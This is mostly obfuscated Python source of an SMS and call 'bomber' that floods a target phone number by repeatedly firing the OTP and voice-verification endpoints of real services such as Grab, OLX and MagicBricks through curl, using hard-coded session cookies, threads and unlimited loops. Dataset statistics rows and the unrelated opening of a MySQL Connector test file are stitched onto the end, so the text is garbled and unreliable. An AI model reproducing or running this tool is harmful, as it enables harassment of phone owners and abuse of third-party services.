return OO00OO0O000O00OOO .find ('code:')!=-1 #line:371:return rd.find('code:') != -1
elif OOO0O0OOOOO0O00OO ==16 :#line:372:elif lim == 16:
os .popen ('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber='+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')#line:374:'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')
return True #line:375:return True
elif OOO0O0OOOOO0O00OO ==100 :#line:376:elif lim == 100:
OO00OO0O000O00OOO =os .popen ('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/'+O00OO00OO0OO0O0OO +'?callType=otpOnCall"').read ()#line:378:pn + '?callType=otpOnCall"').read()
return OO00OO0O000O00OOO .lower ().find ("new otp has been")!=-1 #line:379:return rd.lower().find("new otp has been") != -1
elif OOO0O0OOOOO0O00OO ==101 :#line:380:elif lim == 101:
OO00OO0O000O00OOO =os .popen ('curl -s -X POST -d mobile=%2B'+OO0000O0O00O0OOO0 +'-'+O00OO00OO0OO0O0OO +' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read ()#line:382:' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return OO00OO0O000O00OOO .lower ().find ("otp requests exceeded")==-1 #line:383:return rd.lower().find("otp requests exceeded") == -1
elif OOO0O0OOOOO0O00OO ==102 :#line:384:elif lim == 102:
OO00OO0O000O00OOO =os .popen ('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num='+O00OO00OO0OO0O0OO +'&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read ()#line:385:rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return OO00OO0O000O00OOO .lower ().find ("y")!=-1 #line:386:return rd.lower().find("y") != -1
elif OOO0O0OOOOO0O00OO ==103 :#line:387:elif lim == 103:
os .system ('curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91'+O00OO00OO0OO0O0OO +'"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')#line:389:'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True #line:390:return True
elif OOO0O0OOOOO0O00OO ==104 :#line:391:elif lim == 104:
OO00OO0O000O00OOO =os .popen ('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile='+O00OO00OO0OO0O0OO +'"').read ().decode ('utf-8')#line:392:rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return OO00OO0O000O00OOO .lower ().strip ().find ('callmade')!=-1 #line:393:return rd.lower().strip().find('callmade') != -1
elif OOO0O0OOOOO0O00OO ==106 :#line:394:elif lim == 106:
OO00OO0O000O00OOO =os .popen ('curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id='+O00OO00OO0OO0O0OO +'"').read ()#line:396:'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return OO00OO0O000O00OOO .find ("1")!=-1 #line:397:return rd.find("1") != -1
return False #line:398:return False
def remsp (O000O0OO0O00OO0OO ):#line:401:def remsp(num):
O000O0OO0O00OO0OO =O000O0OO0O00OO0OO .replace (' ','')#line:402:num = num.replace(' ', '')
O000O0OO0O00OO0OO =O000O0OO0O00OO0OO .replace ('-','')#line:403:num = num.replace('-', '')
return O000O0OO0O00OO0OO #line:404:return num
def start (OOO000OO00O000000 ,O0OOOOOOO000OOOO0 ,O0000000OOO00OOO0 ,O00OOO000OOO0O000 ,OO0O0000O0OO0O000 ):#line:407:def start(target, counter, delay, ch, cc):
os .system ("clear")#line:408:os.system("clear")
banner ()#line:409:banner()
OOO0O000OOO00O00O =0 #line:410:failed = 0
OOOOO0O0O0O00OO0O =0 #line:411:requested = 0
O00O00000OO0O000O =int (OOOOO0O0O0O00OO0O )-int (OOO0O000OOO00O00O )#line:412:success = int(requested) - int(failed)
O0000O0OO0O0OOO00 =int (O0OOOOOOO000OOOO0 )+1 #line:413:bombs = int(counter) + 1
while O00O00000OO0O000O <(int (O0000O0OO0O0OOO00 )):#line:414:while success < (int(bombs)):
os .system ('clear')#line:415:os.system('clear')
banner ()#line:416:banner()
try :#line:417:try:
OOO000OOO00OOO000 =random .choice (O00OOO000OOO0O000 )#line:418:api = random.choice(ch)
except Exception :#line:419:except Exception:
if OO0O0000O0OO0O000 =="91":#line:420:if cc == "91":
print ('Sorry All APIs Have Expired Please Update TBomb')#line:421:print('Sorry All APIs Have Expired Please Update TBomb')
input ('Press Enter To Exit...')#line:422:input('Press Enter To Exit...')
exit ()#line:423:exit()
else :#line:424:else:
if O00O00000OO0O000O >0 :#line:425:if success > 0:
print ('\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')#line:427:'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print ('\nWe Are Working Too Hard To Increase The International Limit...')#line:429:'\nWe Are Working Too Hard To Increase The International Limit...')
input ('\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')#line:431:'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os .system ('rm *.xxx* > /dev/null 2>&1')#line:432:os.system('rm *.xxx* > /dev/null 2>&1')
print ('\n\n')#line:433:print('\n\n')
banner ()#line:434:banner()
exit ()#line:435:exit()
else :#line:436:else:
print ('\n\n\tSorry Your Country is Not Supported...')#line:437:print('\n\n\tSorry Your Country is Not Supported...')
print ('\t\tPlease Send A Mail To techpsycho5.0@gmail.com To Let Us Know...')#line:439:'\t\tPlease Send A Mail To techpsycho4.0@gmail.com To Let Us Know...')
input ('Press Enter To Exit...')#line:440:input('Press Enter To Exit...')
exit ()#line:441:exit()
print ("==================================================================")#line:442:print("==================================================================")
print (" BOMBING in progress, please wait !! ")#line:443:print(" BOMBING in progress, please wait !! ")
print (" Please keep your data connection active during bombing !! ")#line:444:print(" Please keep your data connection active during bombing !! ")
print ("==================================================================")#line:445:print("==================================================================")
print (" Target Number : +"+str (OO0O0000O0OO0O000 )+" ",OOO000OO00O000000 )#line:446:print(" Target Number : +" + str(cc) + " ", target)
print (" Number of Requests Sent : ",OOOOO0O0O0O00OO0O )#line:447:print(" Number of Requests Sent : ", requested)
print (" Successful Requests : ",O00O00000OO0O000O )#line:448:print(" Successful Requests : ", success)
print (" Failed Requests : ",OOO0O000OOO00O00O )#line:449:print(" Failed Requests : ", failed)
print ("==================================================================")#line:450:print("==================================================================")
print (" To Contract Me { +8801687262566 } !! #Love Bangladesh ✓ ")#line:451:print(" To Contract Me { +8801687262566 } !! #Love Bangladesh ✓ ")
print (" This Bomber Was Created By Alamin Islam!! ")#line:452:print(" This Bomber Was Created By Alamin Islam !! ")
print ("==================================================================")#line:453:print("==================================================================")
try :#line:455:try:
O0O0OO00OO00OO0O0 =getapi (OOO000OO00O000000 ,OOO000OOO00OOO000 ,OO0O0000O0OO0O000 )#line:456:result = getapi(target, api, cc)
except Exception :#line:457:except Exception:
O0O0OO00OO00OO0O0 =False #line:458:result = False
OOOOO0O0O0O00OO0O =OOOOO0O0O0O00OO0O +1 #line:459:requested = requested + 1
if O0O0OO00OO00OO0O0 :#line:460:if result:
O00O00000OO0O000O =O00O00000OO0O000O +1 #line:461:success = success + 1
else :#line:462:else:
OOO0O000OOO00O00O =OOO0O000OOO00O00O +1 #line:463:failed = failed + 1
while O00OOO000OOO0O000 .count (OOO000OOO00OOO000 )>0 :#line:464:while ch.count(api) > 0:
O00OOO000OOO0O000 .remove (OOO000OOO00OOO000 )#line:465:ch.remove(api)
time .sleep (float (O0000000OOO00OOO0 ))#line:466:time.sleep(float(delay))
if OOOOO0O0O0O00OO0O %3 ==0 :#line:467:if requested % 3 == 0:
checkinternet ()#line:468:checkinternet()
print ('\n\nBombing Completed..')#line:469:print('\n\nBombing Completed..')
os .system ('rm *.xxx* > /dev/null 2>&1')#line:470:os.system('rm *.xxx* > /dev/null 2>&1')
banner ()#line:471:banner()
exit ()#line:472:exit()
os .system ("clear")#line:475:os.system("clear")
banner ()#line:476:banner()
try :#line:477:try:
urllib .request .urlopen ('https://www.google.com')#line:478:urllib.request.urlopen('https://www.google.com')
except Exception :#line:479:except Exception:
print ("You are not connected To Internet!!!")#line:480:print("You are not connected To Internet!!!")
print ("\tPlease Connect To Internet To Continue...\n")#line:481:print("\tPlease Connect To Internet To Continue...\n")
input ('Exiting....\n Press Enter To Continue....')#line:482:input('Exiting....\n Press Enter To Continue....')
exit ()#line:483:exit()
if len (noti )>10 :#line:485:if len(noti) > 10:
print ('\n\n\tNOTIFICATION: '+noti +'\n\n')#line:486:print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception :#line:487:except Exception:
pass #line:488:pass
while True :#line:489:while True:
pn =""#line:490:pn = ""
cc =input ("\tEnter Your Country Code (Without +) { For BD User Type 880 } : ")#line:491:cc = input("\tEnter Your Country Code (Without +) { For BD User Type 880 } : ")
if '+'in cc :#line:492:if '+' in cc:
tc =list (cc )#line:493:tc = list(cc)
tc .remove ('+')#line:494:tc.remove('+')
cc =''.join (tc )#line:495:cc = ''.join(tc)
cc =cc .strip ()#line:496:cc = cc.strip()
pn =input ("\tEnter Target Number: +"+cc +" ")#line:497:pn = input("\tEnter Target Number: +" + cc + " ")
pn =remsp (pn )#line:498:pn = remsp(pn)
if len (cc )>=4 or len (cc )<1 :#line:499:if len(cc) >= 4 or len(cc) < 1:
print ('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')#line:500:print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue #line:501:continue
if len (pn )<=6 :#line:502:if len(pn) <= 6:
print ('\n\nInvalid Phone Number..\n')#line:503:print('\n\nInvalid Phone Number..\n')
continue #line:504:continue
for cch in str (cc +pn ):#line:505:for cch in str(cc + pn):
if not cch .isdigit ():#line:506:if not cch.isdigit():
print ('\n\nPhone Number Must Consist Of Numbers Only\n')#line:507:print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue #line:508:continue
break #line:509:break
type =0 #line:510:type = 0
try :#line:511:try:
if sys .argv [1 ]=="call":#line:512:if sys.argv[1] == "call":
type =1 #line:513:type = 1
except Exception :#line:514:except Exception:
type =0 #line:515:type = 0
if type ==1 :#line:516:if type == 1:
nm =int (input ("Enter Number of Calls To Send(Maximum 100): "))#line:517:nm = int(input("Enter Number of Calls To Send(Maximum 100): "))
if nm >15 :#line:518:if nm > 15:
print ("\t\tYou Have Entered "+str (nm )+".\n\tNormalizing Value To 100")#line:520:".\n\tNormalizing Value To 100")
nm =15 #line:521:nm = 15
dl =float (input ("Enter Delay time (in seconds) [Recommended 5 sec ] : "))#line:522:dl = float(input("Enter Delay time (in seconds) [Recommended 5 sec ] : "))
elif type ==0 :#line:523:elif type == 0:
if cc =="91":#line:524:if cc == "91":
nm =int (input ("Enter Number of Messages To Send(0 For Unlimited): "))#line:525:nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl =float (input ("Enter Delay time (in seconds) [Recommended 1 sec ] : "))#line:527:input("Enter Delay time (in seconds) [Recommended 1 sec ] : "))
else :#line:528:else:
nm =int (input ("Enter Number of Messages To Send: "))#line:529:nm = int(input("Enter Number of Messages To Send: "))
dl =float (input ("Enter Delay time (in seconds) [Recommended 5 sec ] : "))#line:531:input("Enter Delay time (in seconds) [Recommended 5 sec ] : "))
maxlim =0 #line:532:maxlim = 0
if cc =="91":#line:533:if cc == "91":
maxlim =5000 #line:534:maxlim = 5000
else :#line:535:else:
maxlim =5000 #line:536:maxlim = 5000
if nm >maxlim :#line:537:if nm > maxlim:
print ('\n\n\tSorry Due To Misuse Of This Script We Only Provide '+str (maxlim )+' SMS At Once...\n\n')#line:539:str(maxlim) + ' SMS At Once...\n\n')
print ('Number Of SMS Has been Set To '+str (maxlim ))#line:540:print('Number Of SMS Has been Set To ' + str(maxlim))
nm =maxlim #line:541:nm = maxlim
if not cc .strip ()=="91":#line:542:if not cc.strip() == "91":
if type ==1 :#line:543:if type == 1:
print ('\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')#line:545:'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print ()#line:546:print()
input ('Press Enter To Exit....')#line:547:input('Press Enter To Exit....')
print ('\n\n')#line:548:print('\n\n')
exit ()#line:550:exit()
cnt =0 #line:551:cnt = 0
if pn .strip ()==''or dl <=0 or nm <=0 or cc .strip ()==''or cc .find ('+')!=-1 :#line:552:if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print ('\n\n\tSeems Like You Have Given Wrong Inputs...')#line:553:print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input ('\n\t\tPress Enter To Exit...')#line:554:input('\n\t\tPress Enter To Exit...')
exit ()#line:556:exit()
ch =[0 ,14 ,15 ,16 ]#line:557:ch = [0, 14, 15, 16]
start (pn ,nm ,dl ,ch ,str (cc ))#line:558:start(pn, nm, dl, ch, str(cc))
exit ()#line:559:exit()
ch =[OO00OO000O00O0O0O for OO00OO000O00O0O0O in range (17 )]#line:560:ch = [i for i in range(17)]
cbomb =False #line:561:cbomb = False
if pn .strip ()==''or dl <=0 or nm <0 :#line:562:if pn.strip() == '' or dl <= 0 or nm < 0:
print ('\n\n\tSeems Like You Have Given Wrong Inputs...')#line:563:print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input ('\n\t\tPress Enter To Exit...')#line:564:input('\n\t\tPress Enter To Exit...')
banner ()#line:565:banner()
exit ()#line:566:exit()
if type ==1 :#line:567:if type == 1:
print ("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")#line:568:print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print ("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")#line:569:print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb =True #line:570:cbomb = True
if cbomb :#line:571:if cbomb:
chl =[100 ,101 ,102 ,103 ,104 ,105 ,106 ]#line:572:chl = [100, 101, 102, 103, 104, 105, 106]
start (pn ,nm ,dl ,chl ,str (cc ))#line:573:start(pn, nm, dl, chl, str(cc))
exit ()#line:574:exit()
if nm ==0 :#line:575:if nm == 0:
nt =int (input ("\tNumber Of Threads(10 to 50) : "))#line:576:nt = int(input("\tNumber Of Threads(10 to 50) : "))
if nt <=0 or nt >=50 :#line:577:if nt <= 0 or nt >= 50:
print ('\tBD Bomber Shows Better Result in 10 to 50 Threads\n\t\tStill Continuing....')#line:578:print('\tTBomb Shows Better Result in 10 to 50 Threads\n\t\tStill Continuing....')
print ("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")#line:579:print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t =[None ]*nt #line:580:t = [None] * nt
print ("\n\n==================================================================")#line:581:print("\n\n==================================================================")
print (" Gearing Up Bomber, please wait !! ")#line:582:print(" Gearing Up Bomber, please wait !! ")
print (" Please keep your data connection active during bombing !! ")#line:583:print(" Please keep your data connection active during bombing !! ")
print ("==================================================================")#line:584:print("==================================================================")
print (" Target Number : +91",pn )#line:585:print(" Target Number : +91", pn)
print (" Number of Threads : ",nt )#line:586:print(" Number of Threads : ", nt)
print (" Delay : ",dl )#line:587:print(" Delay : ", dl)
print ("==================================================================")#line:588:print("==================================================================")
print (" Use this for fun, not for revenge !! ")#line:589:print(" Use this for fun, not for revenge !! ")
print (" This Bomber Was Created By Alamin Islam !! ")#line:590:print(" This Bomber Was edited BY BLACKLABEL cradits to owner@speedx !! ")
print ("==================================================================")#line:591:print("==================================================================")
input ('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')#line:592:input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os .system ('rm *.xxx* > /dev/null 2>&1')#line:593:os.system('rm *.xxx* > /dev/null 2>&1')
print ("\n\nStarting Bomb....")#line:594:print("\n\nStarting Bomb....")
for i in range (nt ):#line:595:for i in range(nt):
t [i ]=threading .Thread (target =infinite ,args =(pn ,dl ,ch ,maxlim ,))#line:596:t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t [i ].daemon =True #line:597:t[i].daemon = True
t [i ].start ()#line:598:t[i].start()
time .sleep (1 )#line:599:time.sleep(1)
ci =0 #line:600:ci = 0
while True :#line:601:while True:
ci +=1 #line:602:ci += 1
l =count_inf #line:603:l = count_inf
print (" Total Number of Requests Sent : ",l )#line:604:print(" Total Number of Requests Sent : ", l)
if int (l )>maxlim :#line:605:if int(l) > maxlim:
print ('\n\n\tSorry Due To Misuse Of This Script We Only Provide unlimited'+str (maxlim )+' SMS At Once...\n\n')#line:607:str(maxlim) + ' SMS At Once...\n\n')
input ('Press Enter To Exit...')#line:608:input('Press Enter To Exit...')
os .system ('rm *xxx* > /dev/null 2>&1')#line:609:os.system('rm *xxx* > /dev/null 2>&1')
banner ()#line:610:banner()
exit ()#line:611:exit()
time .sleep (1 )#line:612:time.sleep(1)
if ci %3 ==0 :#line:613:if ci % 3 == 0:
checkinternet ()#line:614:checkinternet()
else :#line:615:else:
start (pn ,nm ,dl ,ch ,'91')#line:616:start(pn, nm, dl, ch, '91')
exit ()#line:617:exit()
| 182.235294
| 4,438
| 0.673426
| 9,280
| 68,156
| 5.111315
| 0.172953
| 0.026269
| 0.004174
| 0.006072
| 0.741235
| 0.724475
| 0.712162
| 0.687053
| 0.670609
| 0.651846
| 0
| 0.14608
| 0.110408
| 68,156
| 373
| 4,439
| 182.723861
| 0.605021
| 0.443174
| 0
| 0.325069
| 0
| 0.082645
| 0.684174
| 0.355929
| 0
| 1
| 0
| 0
| 0
| 1
| 0.016529
| false
| 0.00551
| 0.038567
| 0
| 0.126722
| 0.162534
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d70484767a46bf7bcecabce244195f29e4474d6d
| 86,541
|
py
|
Python
|
tests/qa/test_qa_mysqlx_crud_table_select.py
|
timgates42/mysql-connector-python
|
c4729e84a6849fe584034663af39c0ccde92fe44
|
[
"BSD-3-Clause"
] | null | null | null |
tests/qa/test_qa_mysqlx_crud_table_select.py
|
timgates42/mysql-connector-python
|
c4729e84a6849fe584034663af39c0ccde92fe44
|
[
"BSD-3-Clause"
] | 1
|
2021-09-12T22:07:20.000Z
|
2021-09-12T22:07:20.000Z
|
tests/qa/test_qa_mysqlx_crud_table_select.py
|
timgates42/mysql-connector-python
|
c4729e84a6849fe584034663af39c0ccde92fe44
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2021, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import threading
import time
import unittest
import mysqlx
import tests
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 25), "XPlugin not compatible")
class TableSelectTests(tests.MySQLxTests):
"""Tests for table.select(). """
@tests.foreach_session()
def test_table_select1(self):
self.session.sql("drop table if exists t1").execute()
"""Test the table.select with where."""
self.session.sql("create table t1(a int , b int)").execute()
table = self.schema.get_table("t1")
table.insert().values(1, 1).values(2, 1).values(3, 2).execute()
result = table.select("a").where("b== 1").execute()
row = result.fetch_all()
self.assertEqual(len(row), 2)
self.assertEqual(row[1]["a"], 2)
